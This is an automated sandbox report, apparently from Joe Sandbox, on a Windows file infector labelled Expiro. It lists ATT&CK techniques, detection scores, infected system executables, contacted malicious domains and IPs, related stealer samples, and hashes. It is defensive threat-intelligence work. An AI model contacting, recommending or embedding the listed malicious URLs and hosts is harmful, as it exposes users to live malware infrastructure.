DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Windows Service	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	212 Process Injection	222 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	212 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
I3LPkQh2an.exe	87%	ReversingLabs	Win32.Virus.Expiro
I3LPkQh2an.exe	75%	Virustotal		Browse
I3LPkQh2an.exe	100%	Avira	W32/Infector.Gen
I3LPkQh2an.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\AppVClient.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\FXSSVC.exe	100%	Avira	W32/Infector.Gen
C:\Windows\System32\alg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	100%	Joe Sandbox ML
C:\Windows\System32\AppVClient.exe	100%	Joe Sandbox ML
C:\Windows\System32\FXSSVC.exe	100%	Joe Sandbox ML
C:\Windows\System32\alg.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://18.141.10.107/cle	0%	Avira URL Cloud	safe
http://54.244.188.177/w	100%	Avira URL Cloud	malware
http://54.244.188.177/H	100%	Avira URL Cloud	malware
http://54.244.188.177/wbjqiahuptwvbQ(	100%	Avira URL Cloud	malware
http://54.244.188.177/w)	100%	Avira URL Cloud	malware
http://54.244.188.177:80/wbjqiahuptwvb	100%	Avira URL Cloud	malware
http://54.244.188.177/O	100%	Avira URL Cloud	malware
http://54.244.188.177/z	100%	Avira URL Cloud	malware
http://54.244.188.177/q	100%	Avira URL Cloud	malware
http://54.244.188.177/	100%	Avira URL Cloud	malware
http://54.244.188.177/wbjqiahuptwvb	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cvgrf.biz	54.244.188.177	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
time.windows.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://dwrqljrr.biz/wfnlorhejqfnr	false	high
http://warkcdu.biz/gloumaahxxajxf	false	high
http://cvgrf.biz/wbjqiahuptwvb	false	high
http://lrxdmhrr.biz/rwlfutjcp	false	high
http://lrxdmhrr.biz/ibckscxhsodddaet	false	high
http://ssbzmoy.biz/cle	false	high
http://vcddkls.biz/ycqjghy	false	high
http://ssbzmoy.biz/mxe	false	high
http://oshhkdluh.biz/agqwjlv	false	high
http://acwjcqqv.biz/hch	false	high
http://pywolwnvd.biz/osbo	false	high
http://pywolwnvd.biz/w	false	high
http://acwjcqqv.biz/tfd	false	high
http://cvgrf.biz/pajihutcfilntm	false	high
http://wllvnzb.biz/shvehx	false	high
http://knjghuig.biz/voucowxceex	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://18.141.10.107/cle	I3LPkQh2an.exe, 00000000.00000002.1409417800.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://54.244.188.177/w)	I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pywolwnvd.biz/N	I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	false		high
http://18.141.10.107/	I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://54.244.188.177/q	I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/w	I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/z	I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/wbjqiahuptwvbQ(	I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177:80/wbjqiahuptwvb	I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000D10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/H	I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/O	I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/	I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1388701624.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://54.244.188.177/wbjqiahuptwvb	I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1409100605.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000002.1408544408.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.244.188.177	cvgrf.biz	United States		16509	AMAZON-02US	false
18.141.10.107	ssbzmoy.biz	United States		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588101
Start date and time:	2025-01-10 21:23:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	I3LPkQh2an.exe renamed because original name is a hash value
Original Sample Name:	f9d78174d15fee469beb09ad3a07fb4a87333cd00477b8dc934568edcb959738.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@8/10@7/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 69% Number of executed functions: 62 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.101.57.9, 13.107.246.45, 20.12.23.50, 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, vjaxhpbji.biz, ytctnunms.biz, lrxdmhrr.biz, vrrazpdh.biz, tbjrpv.biz, xlfhhhm.biz, warkcdu.biz, npukfztj.biz, anpmnmxo.biz, sxmiywsfv.biz, przvgke.biz, ww7.przvgke.biz, dwrqljrr.biz, gytujflc.biz, gvijgjwkh.biz, zjbpaao.biz, gnqgo.biz, deoci.biz, iuzpxe.biz, nqwjmb.biz, wllvnzb.biz, lpuegx.biz, bumxkqgxu.biz, yhqqc.biz, vcddkls.biz, vyome.biz, dlynankz.biz, gcedd.biz, ww12.fwiwk.biz, oshhkdluh.biz, opowhhece.biz, twc.trafficmanager.net, otelrules.afd.azureedge.net, jpskm.biz, ftxlah.biz, ifsaia.biz, uhxqin.biz, oflybfv.biz, jhvzpcfg.biz, saytjshyf.biz, fwiwk.biz, typgfhb.biz, esuzf.biz, zlenh.biz, myups.biz, otelrules.azureedge.net, yauexmxk.biz, knjghuig.biz, yunalwv.biz, ctldl.windowsupdate.com, brsua.biz, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, mgmsclkyu.biz, qaynky.biz, lejtdj.biz, qpnczch.biz, mnjmhp.biz, azureedge-t-prod.trafficmanager.net, acwjcqqv.biz, jdhhbs.biz
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
15:24:16	API Interceptor	2x Sleep call for process: I3LPkQh2an.exe modified
15:24:50	API Interceptor	3x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.244.188.177	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	pywolwnvd.biz/wlyolqts
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	lrxdmhrr.biz/tbbwyfgx
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	lrxdmhrr.biz/fncvigkebkn
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	cvgrf.biz/dy
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	cvgrf.biz/ubwy
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	cvgrf.biz/mddjrljmh
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	cvgrf.biz/pm
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	cvgrf.biz/yfypviummaqwyuq
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	pywolwnvd.biz/usxsp
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	cvgrf.biz/iropyruplkan
18.141.10.107	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	warkcdu.biz/d
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	vcddkls.biz/we
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	vcddkls.biz/kknpblsbxdrrjko
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	knjghuig.biz/nfm
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	vcddkls.biz/x
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	knjghuig.biz/hsyjdjsftfdjf
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	vcddkls.biz/lqpvpf
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	vcddkls.biz/ytpebbldheutao
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	vcddkls.biz/ymdlhl
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	knjghuig.biz/jedofahyn

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cvgrf.biz	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	54.244.188.177
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
s-part-0017.t-0009.t-msedge.net	295963673155714664.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	24928193762733825739.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	13.107.246.45
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1358019715229232264.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	ZV2G9QQzlR.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
ssbzmoy.biz	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
pywolwnvd.biz	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	54.244.188.177
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	statement.doc	Get hash	malicious	KnowBe4	Browse	52.217.123.201
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	76.223.67.189
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	143.204.205.214
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	18.140.171.98
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	54.189.236.62
AMAZON-02US	statement.doc	Get hash	malicious	KnowBe4	Browse	52.217.123.201
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	76.223.67.189
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	143.204.205.214
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	18.140.171.98
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	54.189.236.62

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1658880
Entropy (8bit):	4.312993604615422
Encrypted:	false
SSDEEP:	24576:kxGBcmlyVg9N9JMlDlfjRiVuVsWt5MJMs:wGy+egFIDRRAubt5M
MD5:	FD31927032749FC47370737BE446DF49
SHA1:	924E2847BA881ECABAA8F2473F019A970F264F71
SHA-256:	0CE4ABE5539BA68DC94F1B5E135F78F59F1A60D31A846689E31FA196DFB04ACF
SHA-512:	395B004FCE7F06AF2072942D92F6F8D10AB1D8394D99B0333FD11A5AFB27EFA91A72A71697F1490F71D4FF63994D4AA9EB3497BFE73B6B91E9C63CA8C00D2598
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................Y.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.809636404857026
Encrypted:	false
SSDEEP:	24:L+d+4N1Qn2XzRFZWtrmZWmIr+bGpBoBHZWqroJ5fZWlbrZW07r7ROWZWqNr3C22c:quSRqBmNGlrs6xqo9tnaD
MD5:	C17C44CFF1BC754A8532E2A8CE12505D
SHA1:	B22BD18E40A5A4D57F2B23612696AD6818B7EF8C
SHA-256:	AFF99D10DD14E5385922D85629C72222CCDE4A50AB8C3106DB0D54CE75CBDD84
SHA-512:	B73F2AB4F4E907B2E273F8C14450DCA47162A417112F2D39DDC9B21ECB01CAAAC4200BFD6A4DDDB00D3D3ACFD36DF9A2DF7844AF4BB025B952E0D61BF0178A0E
Malicious:	false
Reputation:	low
Preview:	2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeAuditPrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeBackupPrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2025-01-10 15:24:21-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeDebugPrivilege...2025-01-10 15:24:21-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2025-01-10 15:24:21-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2025-01-10 15:24:2

C:\Users\user\AppData\Local\Temp\autB916.tmp

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.995165562430459
Encrypted:	true
SSDEEP:	6144:6Ypmu6UEvr9xFVorU2voYB+/6AY4ij/sUxCwlPP+vS:6YpmuJEvBx/d2b+iOiIUDx2K
MD5:	F8BF28E8F7C884D43294055E7E5E00A6
SHA1:	B7EC368487458794CC20D3C200F97F0CA4F855ED
SHA-256:	2CA8463CC1A47B47FFE7D2D9B19A551177A31BEB0BAA0908F8E0111072349094
SHA-512:	CBE50043B3EDD9DB05A668D799A79564B94DF49C2151B10EB5C72EECB20585292E6BE15B55CD15DD0B2FCAC35BD8A8E88794498D755FE9DEE52418EB67044CBC
Malicious:	false
Reputation:	low
Preview:	}..G6A2EI2N0..UC.H80TOG5.2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TO.5A2KR.@0.Q.b.It.u./\2.5?])B 5u R&V_ o%Pa@0#.'^a....%WT1aJ8K.EM2N0AX,B:..P3.zU&.x-U...yS/....!U.W...}82.a![Xi/ .A2EM2N0A..C3.91T....2EM2N0AX.C1I31_OGcE2EM2N0AXUC&H80DOG516EM2.0AHUC3J80ROG5A2EM4N0AXUC3HH4TOE5A2EM2L0..UC#H8 TOG5Q2E]2N0AXUS3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AX{7V0L0TO.`E2E]2N0.\UC#H80TOG5A2EM2N0aXU#3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0

C:\Users\user\AppData\Local\Temp\unspawned

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.995165562430459
Encrypted:	true
SSDEEP:	6144:6Ypmu6UEvr9xFVorU2voYB+/6AY4ij/sUxCwlPP+vS:6YpmuJEvBx/d2b+iOiIUDx2K
MD5:	F8BF28E8F7C884D43294055E7E5E00A6
SHA1:	B7EC368487458794CC20D3C200F97F0CA4F855ED
SHA-256:	2CA8463CC1A47B47FFE7D2D9B19A551177A31BEB0BAA0908F8E0111072349094
SHA-512:	CBE50043B3EDD9DB05A668D799A79564B94DF49C2151B10EB5C72EECB20585292E6BE15B55CD15DD0B2FCAC35BD8A8E88794498D755FE9DEE52418EB67044CBC
Malicious:	false
Reputation:	low
Preview:	}..G6A2EI2N0..UC.H80TOG5.2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TO.5A2KR.@0.Q.b.It.u./\2.5?])B 5u R&V_ o%Pa@0#.'^a....%WT1aJ8K.EM2N0AX,B:..P3.zU&.x-U...yS/....!U.W...}82.a![Xi/ .A2EM2N0A..C3.91T....2EM2N0AX.C1I31_OGcE2EM2N0AXUC&H80DOG516EM2.0AHUC3J80ROG5A2EM4N0AXUC3HH4TOE5A2EM2L0..UC#H8 TOG5Q2E]2N0AXUS3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AX{7V0L0TO.`E2E]2N0.\UC#H80TOG5A2EM2N0aXU#3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0AXUC3H80TOG5A2EM2N0

C:\Users\user\AppData\Roaming\a8a24eee21ca4edc.bin

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.98443877202933
Encrypted:	false
SSDEEP:	384:TxJmhXWECasVSQbp3aUvx4lMolWXvBFqr3R4/:TrmldQRaU54+olS3W3Rw
MD5:	25B97F882FC50608482CFA3F0DFB5828
SHA1:	2177B0DE40154EE8736B3BAEFD76B11EC7D99997
SHA-256:	9746F510BB8E88F0C57AEA381253D2EE53CB0EB786FD6B7E8B82D895BA92E644
SHA-512:	E21BC656B87E1E6EC36A85A3C7D374EC14F005422C1CA0DA31FCDFD3D8AEB66054BBF3DFA2A70AD573115B64D9AA2F614E715F63C56B93EFD736C7F506CCCE03
Malicious:	false
